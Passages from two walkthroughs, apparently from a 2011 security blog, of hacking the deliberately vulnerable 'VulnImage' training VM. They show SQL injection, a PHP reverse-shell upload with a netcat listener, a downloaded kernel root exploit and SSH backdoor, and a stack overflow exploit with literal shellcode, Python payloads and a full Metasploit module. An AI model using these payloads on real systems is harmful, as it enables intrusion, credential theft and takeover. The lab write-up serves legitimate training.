To verify that the attacker managed to login without knowing the password, they quickly check the blog to see if the signature has been updated - which it has been. The attacker then wishes to take advantage of the blog's system of using files to store signatures, however, they need to know the location of where they are stored. By altering the hidden "fname" in the page source code to an incorrect path, forcing an error to be produced, they hope that the error message will contain sensitive information relating to the location. As fname is stored on the client's web page (not hidden when the server processes the page), the attacker is able to modify their local version which is sent back to the server. The attacker could use the firefox addon "firebug" to alter the source code on-the-fly, thus when the page is sent back, it would have the modified variable. However the attacker chooses to use "Tamper Data" to intercept the traffic to modify the data before it is sent back. The reason why the attacker went with Tamper Data is because it is already included with the default install of backtrack 5 r1 (The addon has just been disabled).

'Normal'

Attacker (Firefox) ---> Target (Web server)
Attacker (Firefox) <--- Target (Web server)

Attacker (Firefox) ---> Target (Web server)

'Intercepted'

Attacker (Firefox) ---> Target (Web server)
Attacker (Firefox) <--- Target (Web server)

Attacker (Firefox) ---> Tamper Data ---> Target (Web server)

By using tamper data, when the attacker submits the page, they are now able to edit the data which is sent in the POST request and takes advantage of this by editing the hidden text field "fname" to have an additional forward slash. Slashes are used to indicate folders, now when the blog tries to use the path, there isn't a folder at the location, forcing an error. This produces a message informing the end user that the blog isn't able to access the file or folder (which is due to the modified request), along with detailed paths such as the file which failed to access the location as well as the location which failed. The attacker copies the failed location and amends the path to view the content which should have been requested. The attacker now knows the location of a writeable folder which they have access to. The attacker goes back and tries to see if they are able to execute PHP functions by a simple command to just print a message on the screen. Upon submission they alter the fname field to reflect the file format is now PHP. After which the attacker tries to view the new file, by doing so they discover that they are now able to write PHP functions and the target executes it.

Pentest monkey has created "php-reverse-shell" which allows for an interactive shell to spawn by using PHP commands. The attacker makes a copy of it, making sure the original version isn't edited. Due to the nature of the shell (as it is "reverse") this means communication comes back to the attacker, thus the shell needs to be able to locate the attacker, which is done so by updating the "IP" and "port" field.

Before the attacker views the new signature which would trigger the shell to be executed, the attacker needs to set up a listener, which will capture the request from the target with an interactive shell. The attacker uses "netcat" to be the handler as it is a 'swiss army knife' on the same port used in the shell. The attacker then requests the php shell signature to be displayed. The target then executes the PHP commands causing a shell to be sent back to the attacker. The end result being the attacker is now able to execute commands locally on the target machine using an interactive shell.

The attacker starts checking the local user's home folder, and discovers a C source code, for a program called 'buffd'. After checking to see the running processes, the attacker notices not only the program is being executed, but also by the super-user, root. The current user which the attacker is logged in as (www-data), doesn't have permission to view the file. However the attacker checks the results from DirBuster and notices that the web server also has a file with the same name, and downloads that copy instead. Upon viewing the contents of the source code, the attacker notices that the program uses port "7777". The attacker checks locally on the target to see if TCP port 7777 is open, which it is, but is unable to confirm if the PID matches to the running process. At the same time looking at the source code, the attacker notices a vulnerable function - which is called "vulnerable". Editor's note: An explanation of the vulnerable code is below:

void vulnerable(char *net_buffer)
{
   char local_buffer[120];
   strcpy(local_buffer, net_buffer);
   return;
}

The function is vulnerable because of the buffer 'local_buffer', has been set to '120', therefore when the argument 'net_buffer', is copied into the buffer anything greater than 120 will 'overflow' it. The extra bytes will run past the buffer and overwrite the space set aside for the frame pointer, return address etc. This causes the process stack to be corrupt which potentially alters the program's execution path as the functions return address is the address of the next instruction in memory, which is immediately executed after the function returns. When using 'strcpy' it doesn't check the bounds, so the solution would be to use 'strncpy'.

The attacker checks the file type of the potential binary version of buffd, as well as the folder in which it is being executed from. The attacker notices the binary was compiled on Linux 2.6.8 as well as having a 'core' file in the same folder. The attacker knows that a core file is a 'memory dump' and is produced when a program crashes and is able to extract key information about how and why the program crashed (which is useful to know when creating an exploit as the attacker needs to understand what is happening).

The attacker then decides that they are going to attempt to create an exploit for the vulnerable program, buffd. They chose to develop the exploit locally on the target, as its the environment the exploit will be used in. The first thing the attacker does, is to disable any file and memory protection such as 'Address Space Layout Randomization (ASLR)' as it moves segments about, creating randomness in addresses thus making it harder to exploit applications. The attacker tries to disable ASLR, however they notice that the file '/proc/sys/kernel/randomize_va_space', which is used to temporarily disable ASLR is missing. They then check the kernel version to see its 2.6.8 (which hints that the binary file could of been compiled locally and not imported) which by default doesn't have ASRL (ASLR got added into the Linux kernel by default from 2.6.12 onwards), therefore the attacker doesn't have to worry about ASLR. Editor's note: I was unable to exploit buffd locally on the attackers machine.

As the buffd is being executed as the super-user, the current user (same as the web service they exploited) they are logged in as isn't going to have permission to control the program. The attacker needs to escape privileges another way to gain a higher level of access in the system. One common method is by exploiting the kernel (ONLY if it is vulnerable!). The attacker searches their local copy of a public exploit database, "exploit-db.com". Upon searching for the exact same kernel version, it only returned one known exploit (which was un-successful). The attacker carries on by searching for the same "major.intermediate" versions (removed ".minor"), and sorts them in ascending order. This returns results for kernel versions that are higher and lower than the target version as well as "generic" ones. The justification for this is that lots of exploits are available for a certain version and/or lower, the ones which are higher than the one used on the target could work. After searching the results, the attacker finds a suitable exploit that will potentially work. After viewing the exploit, it requires additional files to be downloaded. The attacker downloads the exploit package and moves it to their local root folder website path. They make sure the exploit is able to be read, by anyone by giving it certain permissions, as the web server uses a different user than the one which the attacker is currently logged in as and executing commands from. The web server is then started.

The attacker controls the target to download the exploit package from the attacker and then extracts it. The included bash script does all the necessary commands and the end result is that the attacker has now gained root access to the target. When the attacker discovered the running process and network connections, they saw that TCP port 22 was open (which by default is used for SSH) as well as the SSH daemon running; as a result they change the password to something which they know, allowing the attacker to login via SSH. The advantage of SSH is that it is a TTY shell to interact with the target as well as acting like a backdoor into the system, so they don't have to exploit the target again.

After login into the box again the attacker prepares the target's environment by removing the old core file (Editor's note: This is actually a mistake that will be explained later), allowing unlimited sized core files to be produced as well as killing all instances of the program. The attacker then executes buffd.

The attacker then connects back into the target using the backdoor. If the program "screen" was installed locally on the target, then this wouldn't be needed as the attacker would only need one terminal to work in. In the new window, the attacker watches the local folder that buffd is being executed in, as this will notify the attacker if something happens in the folder.

The attacker then remotely starts to interact with the target's buffd. By using netcat the attacker is able to see how the program would normally function. Then by piping commands into netcat they are able to automate the procedure which speeds up development time. The attacker then checks to see the status of the target and buffd. The program itself gives notification of connection and that they have not had any changes to the folder. The attacker carries on by using python to script the automated input to buffd. They start off using 10 "A"s, then move onto 100, then 1000. At this stage the "watch" window has notified that there has been a change. When the attacker views the output, they spot that a core file has been created thus the attacker has caused the program to crash! The attacker goes back and sends a further 10 "A"s to the target, and it appears to response normally, meaning only a thread crashed, not the complete program. Editor's note: It is good practice to restart the program each time it crashes - just in case something 'more' crashed.
buffer #1: <A * 10>
buffer #2: <A * 100>
buffer #3: <A * 1000>
buffer #4: <A * 10>

The attacker connects back into the target, this time this window is used to debug the core file that was produced. This allows the attacker to see the state the registers were in when the core file was created. Upon inspection the attacker notices the EIP has been overwritten with 41 (which is HEX for the ASCII A, which matches the data being sent). This means the attacker controls EIP, which results in the attacker being able to control the 'flow' of the program!

The next stage is to see which part of the buffer that was sent to the target has overwritten the EIP address. The attacker uses metasploit's aid to locate this address, as 'pattern_create.rb' creates a unique random string for the given length. As the program crashed when the attacker sent 1000 "A"s the attacker uses the same number again. This time, instead of sending the same thing over and over again, the attacker uses metasploit's output. When this is sent to the target, this also causes the program to create another core file, hinting that it's crashed again, however this time, EIP is different. The attacker copies the EIP value and passes it back into metasloit, this time using the other half of the script, 'pattern_offset.rb'. As the string is unique, metasploit is able to calculate the exact part of the buffer which caused EIP to be over written, which is 124. This can be verified as the attacker has the potential source code to the program (the buffer was set to 120). The attacker then verifies metasploit's result by sending 124 "A"s, then the next 4 "B"s, and calculates the remaining values to be "C"s, which means if everything is correct, when the attacker causes the program to crash again, the only 4 "B"s will be in the EIP address.
buffer #5: <A * 124>< B * 4> <C * 872>

Another feature of metasploit is its ability to produce shellcode from its payloads. This is the code that the attacker wants the vulnerable code to execute. The attacker chooses to use a bind shell, which opens a port locally and allows for remote communication to execute commands. When creating the shellcode, the attacker chooses not to use '00' or 'ff' as when it is being injected into a process it could have an effect on the existing running code, for example, '00' terminate strcpy(), which is the vulnerable function in buffd. Editor's note: I will do another guide explaining how to find bad characters at a later date. The attacker then prepares the buffer by adding NOPs in after the second part of the buffer, the Bs. Editor's note: The amount, 26 was chosen at random. A NOP or 'No Operation' command effectively doesn't do anything. The reason why NOPs are used is to create a 'NOP slide' (sometimes referred to a 'NOP sled') and is used to 'pad' when the exact position in memory can't be determined with absolute accuracy. It doesn't matter if the pointer is set to the start or the middle of the NOP slide, it will still perform the same, thus making the exploit more universal in different environments as memory addresses can be different. The attacker then adds in 4 Cs, which are used for debugging purposes as they signal the position in memory. Afterwards the attacker places the shellcode from metasploit and along with some more NOPs. As the original buffer was 1000 bytes, the buffer always needs to equal 1000, and the remaining amount is set to Cs to help with debugging the buffer. The attacker then sends the new buffer to cause the program to crash, creating a core file once more.
buffer #6: <A * 124>< B * 4><NOP * 26><C * 4><SHELLCODE * 105><NOP * 40><C * 697>

The attacker uses the debugger "GDB", to see the values that are set at the various registers. By viewing the first 200 bytes at the EAX register, the attacker is able to see the start of the buffer which they sent to the target, as it contains As. Then it's the EIP address which contains 4 Bs, then the NOP sled, then the debugging Cs that indicates the next stage is the shellcode, which takes up the rest of the view. By viewing the ESP register, we can see it's pointing into the NOP sled which will result in executing the shellcode, therefore by replacing the Bs with the address in ESP, the program should execute the injected shellcode. After the shellcode is the rest of the padding to cause the buffer to equal 1000 bytes.
buffer #7: <A * 124>< B * 4><NOP * 30> <SHELLCODE * 105><NOP * 737>

The buffer gets updated to remove the debug Cs thus extended to the NOPs. The attacker restarts buffd and does a test to verify the progress so far. After examining the core file, the attacker copies the EIP address to replace the Bs in the buffer. Before sending the final buffer to the target, the attacker restarts the program, closes all connections to the target and checks that the bind port is currently closed. Once the attacker sends the buffer to the target, the response hangs this time. The attacker then repeats connecting to the bind port, and this time the attacker is able to execute commands. As soon as the connection on the bind shell is closed, the buffd program also finishes.
buffer #8: <A * 124><EIP * 4><NOP * 30> <SHELLCODE * 105><NOP * 737>

The attacker then restarts the target's machine as the attacker has affected multiple aspects of the environment, and would like to make sure the exploit works in a normal clean setup. As the target's machine is starting up again, the attacker takes the time to create a metasploit module. Some advantages of using the metasploit framework is its built in handler, as well as automatically updating the exploit, for example, the attacker is able now to customize the shellcode (the payload) which is executed on the client, without having to update the padding to reflect the difference in shellcode size. Once the module has been created, the attacker starts up metasploit, selects the new exploit and fills in the target's details. This time, the attacker uses a different payload, as originally it was a bind connection, however they now test out the module by using a reserve connection. The attacker now tries the original buffer re-created in metasploit, however it fails.

The attacker now connects back via SSH, enables core files to be created once more and restarts the buffd service this time instead of executing the program directly. The attacker sends the original python buffer to the target before the "B"s were replaced, which caused buffd to crash. Upon looking at the EIP in the core file, the attacker sees the value this time is different. The attacker updates the metasploit module to reflect the changes and reloads the exploit in the framework. The attacker tries again to send the exploit using metasploit, this time they are presented with a shell.
*See 'vulnimage.rb' for the source code*

Game over

The attacker then restores the targets machine, back to its original state and starts it up. After exploiting the complete system again, the attacker is able to gain access to the original core file - which was deleted the first time. After opening the core file in the debugger, the attacker is able to update the exploit to reflex the EIP register. Therefore the attacker has a permanent backdoor into this target's virtual machine. Editor's note: I didn't originally plan to explain the video to include creating a metasploit module, which is why the core file wasn't needed, therefore it wasn't moved into a safe location for use later... Lesson learnt: Move files, don't delete them ;)

Game over...again

Commands

netdiscover -r 192.168.0.1/24
us -H -msf -Iv 192.168.0.110 -p 1-65535 && us -H -mU -Iv 192.168.0.110 -p 1-65535
nmap -p 1-65535 -T4 -A 192.168.0.110    # -p 22,25,80,139,445,3306,7777 
// BT -> BackTrack -> Vulnerability Assessment -> Web Application Assessment -> Web Application Fuzzers ->  # Target: http://192.168.0.110. File: /pentest/web/dirbuster/directory-list-lowercase-2.3-small.txt. Disable: Brute Force File, Be recursive. #java -jar /pentest/web/dirbuster/DirBuster-0.12.jar  
// firefox -> 192.168.0.110   # blog (/myblog/) [username: blogger] -> Post new entry! (/admin/post.php) -> Change profile settings! (/admin/post.php)
// blogger // password // Test
// blogger // ' OR 1=1-- - // Test
// Right click -> View Source [fname: sig.txt]. Tools -> Tamper Data -> Enable -> Restart Firefox -> Start Tamper
// blogger // ' OR 1=1-- - // Test
// Tamper -> fname: /sig.txt. Stop Tamper
curl http://192.168.0.110/profiles/blogger-sig.txt
// blogger // ' OR 1=1-- - // <?php echo "Test2"; ?>
curl http://192.168.0.110/profiles/blogger-sig.php
// Tamper -> fname: sig.php. Stop Tamper
cat /pentest/backdoors/web/webshells/php-resever-shell.php 
nc -lvvp 443
// blogger // ' OR 1=1-- - // <php-resever-shell.php>   # Edit IP address & Port 
// Tamper -> fname: sig.php

curl -D - http://192.168.0.110/profiles/blogger-sig.php 

cd /home/
alias ll="ls -lAh"
ll
cd testuser
ll
ps aux
!! | grep buffd
cat buffd.c

// Check DirBuster -> firefox -> repo
cd /tmp
wget 192.168.0.110/repo/buffd.c
less buffd.c

netstat -antp
file /usr/local/sbin/buffd
ll /usr/local/sbin/
ll /proc/sys/kernel/         # Does't have ASLR!
uname -r                     # < 2.6.12

cd /pentest/exploits/exploitdb
cat files.csv | egrep -i "linux|kernel|local" | grep -v dos | uniq | grep 2.6.8
cat files.csv | egrep -i "linux|kernel|local" | grep -v dos | uniq | grep 2.6 | cut -d "," -f 3 | sort
cat files.csv | egrep -i "linux|kernel|local" | grep -v dos | uniq | grep 2.6 | egrep "<|<=" | sort -k3
cat platforms/linux/local/9574.txt
wget http://exploit-db.com/sploits/2009-therebel.tgz -O /var/www/exploit.tgz
chmod 755 /var/www/exploit.tgz
/etc/init.d/apache2 start

cd /tmp
wget 192.168.0.162/exploit.tgz
tar zxvf exploit.tgz
cd therebel
ls -lAh
bash therebel.sh
id
ulimit -c
ulimit -c unlimited        # Create core files
ulimit -a

watch -t -n 1 "ls -l"

nc 127.0.0.1 7777    # test
echo test  | !!
python -c 'import sys;sys.stdout.write("\x41" * 10)' | !nc
python -c 'import sys;sys.stdout.write("\x41" * 100)' | nc 192.168.0.110 7777
python -c 'import sys;sys.stdout.write("\x41" * 1000)' | nc 192.168.0.110 7777
python -c 'import sys;sys.stdout.write("\x41" * 10)' | nc 192.168.0.110 7777   # Just one thread that died

apt-get install gdb
gdb --core core
info registers eip                                                      # info reg eip   # i f eip
quit                                                                    # q
rm core

/pentest/exploits/framework/tools/pattern_create.rb 1000 > 1000
cat 1000 | nc 192.168.0.110 7777

gdb --core core
i r eip

/pentest/exploits/framework/tools/pattern_offset.rb 0x65413165 1000     # space: 124

quit
rm core; ./buffd

python -c 'import sys;sys.stdout.write("\x41" * 124 + "\x42" * 4 + "\x43" * 872)' | nc 192.168.0.110 7777     # echo 1000-124-4 | bc

gdb --core core
i r eip

x/200xb $eax
quit
rm core; ./buffd

msfvenom -l payloads 2>&1 | grep linux
msfvenom -p linux/x86/shell_bind_tcp -b '\x00\xff' -f c                 # shellcode:  105
python -c 'import sys;sys.stdout.write("\x41" * 124 + "\x42\x42\x42\x42" + "\x90" * 26 + "\x43\x43\x43\x43" + "\xdd\xc7\xd9\x74\x24\xf4\xba\x75\xd0\x5b\x85\x5e\x33\xc9\xb1\x14\x31\x56\x19\x03\x56\x19\x83\xee\xfc\x97\x25\x6a\x5e\xa0\x25\xde\x23\x1d\xc0\xe3\x2a\x40\xa4\x82\xe1\x02\x9e\x14\xa8\x6a\xde\xab\x5d\x36\x4a\xbc\x0c\x96\x03\x5d\xc4\x70\x4c\x53\x99\xf5\x2d\x6f\x29\x01\x1e\x09\x80\x89\x1d\x66\x7c\x44\x21\x15\xd8\x3c\x1d\x42\x16\x40\x28\x0b\x50\x28\x84\xc4\xd3\xc0\xb2\x35\x76\x79\x2d\xc3\x95\x29\xe2\x5a\xb8\x79\x0f\x90\xbb" + "\x90" * 40 + "\x42" * 4 + "\x43" * 763)'| nc 192.168.0.110 7777   # A B NOP C SHELL NOP   (B will be EIP, C is debugging - can be added onto NOPs, NOPs at the end to pad)
gdb --core core
i r esp                                                                 # ESP: 0xbffff330
x/200xb $esp                                                            # start of Cs
quit
rm core; ./buffd

nc -vv 192.168.0.110 4444
python -c 'import sys;sys.stdout.write("\x41" * 124 + "\x30\xf3\xff\xbf" + "\x90" * 30 + "\xdd\xc7\xd9\x74\x24\xf4\xba\x75\xd0\x5b\x85\x5e\x33\xc9\xb1\x14\x31\x56\x19\x03\x56\x19\x83\xee\xfc\x97\x25\x6a\x5e\xa0\x25\xde\x23\x1d\xc0\xe3\x2a\x40\xa4\x82\xe1\x02\x9e\x14\xa8\x6a\xde\xab\x5d\x36\x4a\xbc\x0c\x96\x03\x5d\xc4\x70\x4c\x53\x99\xf5\x2d\x6f\x29\x01\x1e\x09\x80\x89\x1d\x66\x7c\x44\x21\x15\xd8\x3c\x1d\x42\x16\x40\x28\x0b\x50\x28\x84\xc4\xd3\xc0\xb2\x35\x76\x79\x2d\xc3\x95\x29\xe2\x5a\xb8\x79\x0f\x90\xbb" + "\x90" * 40 + "\x42" * 4 + "\x43" * 763)'| nc 192.168.0.110 7777
nc -vv 192.168.0.110 4444

cd /pentest/exploits/framework/modules/exploits/linux/misc
vi vulnimage.rb
msfconsole
search vulnimage
use exploit/linux/misc/vulnimage
info
show options
set payload linux/x86/shell/reverse_tcp
set RHOST 192.168.0.110
set LHOST 192.168.0.162
show options
exploit
exploit
exploit

vulnimage.rb

# Template: http://dev.metasploit.com/redmine/projects/framework/wiki/DeveloperGuide#A23-Exploit

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'VulnImage.zip Stack Buffer Overflow (\'buffd\' Daemon)',
                        'Description'    => %q{
                                        A simple exploit for the 'boot to root', vulnimage.zip.
                                        The vulnerability is in daemon service, 'buffd', which runs as root at startup.
                                             },
                        'License'        => MSF_LICENSE,
                        'Author'         => [ 'g0tmi1k' ],
                        'Version'        => '$Revision: 1 $',
                        'References'     =>
                           [
                              [ 'Download', 'http://ds.mathematik.uni-marburg.de/~lbaumgaertner/vulnimage.zip' ],
                           ],
                        'Payload'        =>
                                {
                                        'Space'    => 672,
                                        'BadChars' => "\x00\xff",
                                },
                        'Platform'       => 'lin',
                        'Targets'        =>
                                [
                                        [ 'VulnImage.zip Virtual Machine',{'Ret' => 0xbffff380, } ]   # Direct address (NOP sled!)
                                ],
                        'Privileged'     => false,
                        'DisclosureDate' => 'Nov 17 2011',
                        'DefaultOptions' =>
                                {
                                        'RPORT' => '7777',
                                        'EXITFUNC' => 'process',
                                },
                        'DefaultTarget' => 0,
                        'Privileged'     => false
                        ))
       end



       def check
          return Exploit::CheckCode::Vulnerable   # Will always return true
       end



       def exploit
          connect

          # Feedback to user
          print_status("Sending #{payload.encoded.length} byte payload...")

          # Crafting exploit
          buf = "A" * 124
          buf += [ target.ret ].pack('V')
          buf += make_nops(30)
          buf += payload.encoded

          # Sending exploit!
          sock.put(buf)
          sock.get

          handler
          disconnect
       end
end

Notes

When starting the VM for the first time with VMware, select "I Moved It" - otherwise it could cause issues (e.g. the target might not be 'visible'!).
Some mistakes in the video are more obvious.
Instead of using "php-reverse-shell" & "netcat", "PHP Meterpreter" & "Metasploit" could of been used.
Could of viewed the page (profile.php - line 28) source to find the MySQL credentials, e.g. "mysql_connect ('localhost', 'root', 'toorcon') ;"
By default the VM is set to use the network adapter to be in "NAT" mode, lots of people like to use it in "bridged" mode.
The VM uses DHCP to acquire an IP address
This isn't the best guide for learning the basics to exploit development. To fully understand it, its worth reading corelan website as well as sickn3ss's guides.
The exploit uses an static address to jump to, as I don't locate an ESP address to use.

0xbffff330 = Direct
0xbffff320 = Daemon
0xbffff380 = Orignal VM

Song(s): W&W - Manhattan (Original Mix) & Armin van Buuren - Full Focus & Above & Beyond ft Richard Bedford - Sun & Moon (Marcus Schossow Remix Edit) & Armin van Buuren Presents Gaia - Status Excessu D (ASOT 500 Theme)
Video length: 21:58
Capture length: 71:40
Blog Post: http://g0tmi1k.blogspot.com/2011/12/video-vulnimage-manual-method.html
Forum Post: http://www.backtrack-linux.org/forums/showthread.php?t=47186&p=211920#post211920

~g0tmi1k

[Video] VulnImage - Automated Method

2011-12-14T21:17:00.000Z

Links
Watch video on-line: http://blip.tv/g0tmi1k/vulnimage-automated-5823019
Download video: http://mediafire.com/?ul63qrct6rzyua8

Brief Overview

VulnImage is an obscure (I can't even find a 'homepage' as such, for it!) "boot-to-root" operating system which has purposely crafted weakness(es) inside itself. The user's end goal is to interact with it and get the highest user privilege they can.

The 'automated' tag is because of the combination of Burp Proxy & SQLMap to discover the SQL injection vulnerability with very limited user interaction as well as using a kernel exploit to escalate privileges to gain root access. A more advanced method can be found here.

Method

Scanned network for the target [NetDiscover]
Port scanned the target [UnicornScan]
Banner grabbed the services running on the open port(s) [NMap]
Interacted & intercepted with the web server [Firefox & Burp Proxy]
Discovered an SQL injection vulnerably [SQLMap]
Manipulate the blog to upload an encoded backdoor [Pentestmonkey's Php-Reverse-Shell & Metasploit]
Escalated privileges via a vulnerable kernel version [udp_sendmsg]
Accessed the 'flag' [Phrack]

What do I need?

vulnimage.zip (MD5: 8CB0E628AEB3C7E1F771764D07280655).
A virtual machine (Example: VMware Player or Virtual Box).
NetDiscover – (Can be found in BackTrack 5).
UnicornScan – (Can be found in BackTrack 5's repository).
NMap – (Can be found in BackTrack 5).
Firefox – (Can be found in BackTrack 5).
Burp Proxy – (Can be found in BackTrack 5).
SQLMap – (Can be found in BackTrack 5).
Msfvenom – (Part of Metasploit & Can be found in BackTrack 5).
php-reverse-shell – (Can be found in BackTrack 5).
NetCat – (Can be found in BackTrack 5).
udp_sendmsg – (Found on exploit-db.com & Can be found in BackTrack 5).

Walkthrough

The first stage is to locate the target, which the attacker does by using "NetDiscover" as this quickly lists all IP's, Media Access Control (MAC) addresses and any known vendors that relate to the MAC address in any subnet. The attacker knows that the target is using VMware, as there aren’t any other virtual machines in use and the target hasn't spoofed their MAC address, therefore, the target is successfully identified.

As the attacker can now isolate the target on the network, the attacker proceeds by port scanning the target as this allows the attacker to see if there are any services which are listening on the exposed interface. The attacker chooses to use "UnicornScan" as it is accurate & efficient whilst scanning at speed. The result being it discovers 7 open TCP ports; 22 (SSH), 25 (SMTP), 80 (HTTP), 139 (NETBIOS), 445 (SAMBA), 3306 (MySQL) and 7777 (CBT). There is only 1 UDP port, 137 (NETBIOS). The attacker then chooses to verify the TCP results by using "nmap" to do another port scan. At the same time, the attacker takes advantage of some other features built into nmap, such as its scripting engine. This enumerates the open port's protocols and services which have been detected, as well as banner grabbing. The attack chooses to interact with the web service which is running on the default TCP port 80. The justification for this is because it is a very graphical, friendly and common way in, allowing the end user to interact. As a result there could be lots of information which could be enumerated as well as very poorly written code which could be taken advantage of.

The web service responds normally when the attacker interacts with it using a web browser, "firefox", however the attacker then takes it one stage further by capturing any requests which are made to it using "burp proxy".

'Normal'

Attacker (Firefox) <---> Target (Web server)

'Intercepted'

Attacker (Firefox) <---> Burp Proxy <---> Target (Web server)

By using burp proxy, the attacker is able to monitor every aspect of what is being requested and then how the web server responds. The attacker then just interacts normally with the target by viewing pages. The attacker soon sees the web service is running a blog, and notes the username (blogger) from which two posts have been made. After freely clicking a few links, the attacker sees that anyone can view the page which can make new blog posts, however there is a username & password field which the attacker doesn't have credentials for along with a page to update their profile. The attacker doesn't know any credentials and therefore fills in random junk data into the fields before submitting. This is done for burps benefit as it will capture the requests thus knowing data can be entered on this page. The attacker is presented with a message saying the username and or password is wrong. At this point the attack restores proxy settings as firefox is not needed any longer.

When the attacker was interacting the with the web application, they made a request with data that they entered. The data which was filled in was checked against a form of database to see if there was an entry that matched. By using "SQLMap" allows the attacker to manipulate the database in ways the original request wasn't meant for (providing that the field hasn't been 'correctly' filtered). SQLMap allows for multiple database formats, using different injection techniques and inbuilt enumeration to be tested without any user interaction. The attacker simply uses the log file which was created from burp and requests what information is to be enumerated. The attacker soon discovers the web service which is being used, as well as the operating system, the database and user which is connected to it, and, if that user is database administrator. The attacker then 'dumps' all the username and passwords for the database - these could be cracked to see if any credentials were re-used. The attacker checks to see if any users to the database and the operating system match. The attacker moves on by viewing the database structure as well as the contents. Upon inspection they enumerated three databases along with the column names, types and number of entries. The last stage for the attacker was to view the contents of the blog's credentials. As the attacker has successfully managed to enumerate the whole database, the attacker was able to very easily locate the credentials, and soon discover that they are stored in 'plain text'.

Another feature of burp is its 'repeater', which allows for data to be easily viewed, edited and sent multiple times. The attacker locates the request which was made at the beginning with junk data and passes it to the repeater and updates the respectable fields with the newly acquired credentials. The attacker notices another field, which, when they made the 'normal' request with the junk data, they didn't have 'control' over. This 'hidden' field looks like it as a file extension that is commonly used for text files. Before the attacker makes the new request, they add an additional forward slash which is used to signal the use of folders instead of files in a Linux environment (which the attacker managed to identify when they used SQLMap). At the end of the response of the web application, is an error message informing the end user that it isn't able to access the file or folder (this is due to the modified request), along with detailed paths such as the file which failed to access the location as well as the location which failed! The attacker copies the failed location and amends the path, to view the content which should have been requested. Upon viewing it, the attacker sees that this is the location of the signature for the user (text which is always included when the user makes a post). This wasn't stored in the database, but in a file instead, which means to allow users to update their signatures this folder has to be writeable. The attacker goes back to the repeater, and tries to use a single PHP coded line in the signature to see if they are able to execute PHP functions on the server itself. Before they made the request, they fix the hidden field to be correct, as well as update the file format to indicate that it’s a PHP file and not a text document. The result is that the attacker was able to view their simple processed test message, not the code itself, which means the attacker, is able to write PHP functions and the target executes it.

Pentest monkey has created "php-reverse-shell" which allows for an interactive shell to spawn by using PHP. The attacker makes a copy of it, making sure the original version isn't edited. Due to the nature of the shell, its reversed, which means communication comes back to the attacker, thus the shell needs to be able to locate the attacker. The attacker then specifies their IP address and a port of their choosing. After updating the shell, the attacker encodes it using "msfvenom" to 'base64'. The reasoning for this is because we do not wish for the content of the shell to be interpreted by the blogging software's update profile feature, as there is a chance the contents of the shell could be interrupted before it's all submitted. Editor's note: There are other reasons for encoding it, but I'm not discussing them now.

Before the attacker views the new signature, which would trigger the shell to be executed, the attacker needs to set up a listener, which will capture the request from the target with an interactive shell. The attacker uses "netcat" to be the handler as it is a 'swiss army knife', and is able to understand the raw data being sent from the target to it. The attacker has netcat listening on the same port as used in the shell, and then requests the php shell signature to be displayed. The target then executes the PHP commands, which decodes the base64 shell, and then processes the contents causing a shell to be sent back to the attacker. The end result being the attacker is now able to execute commands locally on the target machine using a interactive shell.

The attacker quickly checks to see which user they are currently logged in as. This will be the same as the web service as that was the process to execute the shell connection. The attacker now tries to escape privileges to gain a higher level of access to the system. One common method is by exploiting the kernel (ONLY if it is vulnerable!). The attacker finds the current kernel version out and searches their local copy of a public exploit database ("exploit-db.com"). Upon searching for the exact same kernel version, it only returns one known exploit (which was un-successful). The attacker carries on by searching for the same "major.intermediate" versions (removed ".minor"), and sorts them in ascending order. This returns results for kernel versions that are higher and lower than the target version as well as "generic" ones. The justification for this is due to how the exploits are labelled. In the name of the exploit the vulnerable version could be for a certain version AND lower versions. Therefore as the searched string wouldn't match and it wouldn't be displayed in the results yet it could work. After searching the results, the attacker finds a suitable exploit that will potentially work. After viewing the exploit, it requires additional files to be downloaded. The attacker downloads the exploit package and moves it to their local root folder website path. They make sure the exploit is able to be read by anyone by giving it the certainly permissions as the web server uses a different user than the one which the attacker is currently logged in as and executing commands as. The last stage is to start the web service.

Using the target, the attacker locates a folder which they have the permission to write and execute files from. After locating such a path, the attacker then controls the target to download the exploit package from the attacker and extract it. The included bash script does all the necessary commands and the end result is that the attacker has now gotten root access to the machine.

Game over

Upon exploring the file structure, in the home folder for the user "testuser" there is a folder called "stuff" which is only accessible to the superuser, root. Inside the folder, is a compressed archive of what appears to be the digital magazine, phrack. After it has been extracted and checking on the website the file was confirmed to be volume 67.

Game over...again

Commands

netdiscover -r 192.168.0.1/24
us -H -msf -Iv 192.168.0.110 -p 1-65535 && us -H -mU -Iv 192.168.0.110 -p 1-65535
nmap -p 1-65535 -T4 -A -v 192.168.0.110    # -p 22,25,80,139,445,3306,7777 
firefox -> 192.168.0.110 
BT -> BackTrack -> Vulnerability Assessment -> Web Application Assessment -> Web Application Proxies -> burpsuite
// Burp -> Proxy -> Intercept -> Off. Proxy -> Options -> Port: 8080. Options -> Misc -> Proxy -> Requests (Enable) -> /root/burp.log. Target.
// Firefox -> Edit -> Preferences -> Advance -> Network -> Settings -> Manual proxy configurations -> 127.0.0.1:8080. blog (/myblog/) [username: blogger] -> Post new entry! (/admin/post.php) -> test // test // test
cd /pentest/database/sqlmap/
./sqlmap.py -l /root/burp.log --banner --current-user --current-db --is-dba
./sqlmap.py -l /root/burp.log --passwords
./sqlmap.py -l /root/burp.log --batch --file-read=/etc/passwd
cat /pentest/database/sqlmap/output/192.168.0.110/files/_etc_passwd
./sqlmap.py -l /root/burp.log --batch --dbs
./sqlmap.py -l /root/burp.log --batch --tables
./sqlmap.py -l /root/burp.log --batch --columns --count -D blogdb
./sqlmap.py -l /root/burp.log --batch --dump -D blogdb

// Burp -> target -> site map -> right click -> send to repeater. Repeater -> request -> params. Username: blogger Password: blogger01 sig: test frame: /sig.txt
// firefox -> 192.168.0.110/profiles/blogger-sig.txt
// Burp -> target -> site map -> right click -> send to repeater. Repeater -> request -> params. Username: blogger Password: blogger01 sig: <?php echo "test test 123"; ?> frame: sig.php
// firefox -> 192.168.0.110/profiles/blogger-sig.php
cp /pentest/backdoors/web/webshells/php-resever-shell.php /tmp/shell.php
cd /tmp
nano shell.php   # remove "<?" and "?>". Edit IP address and port   [ifconfig eth0]
msfvenom -p generic/custom -e php/base64 -f raw PAYLOADFILE=shell.php
nc -lvvp 443
// Burp -> target -> site map -> right click -> send to repeater. Repeater -> request -> params. Username: blogger Password: blogger01 sig: <?php [msf output] ?>
// firefox -> 192.168.0.110/profiles/blogger-sig.php
# Burp -> file -> exit.
# Firefox -> edit -> Preferences -> Advance -> Network -> Settings -> use system proxy settings
id
uname -a

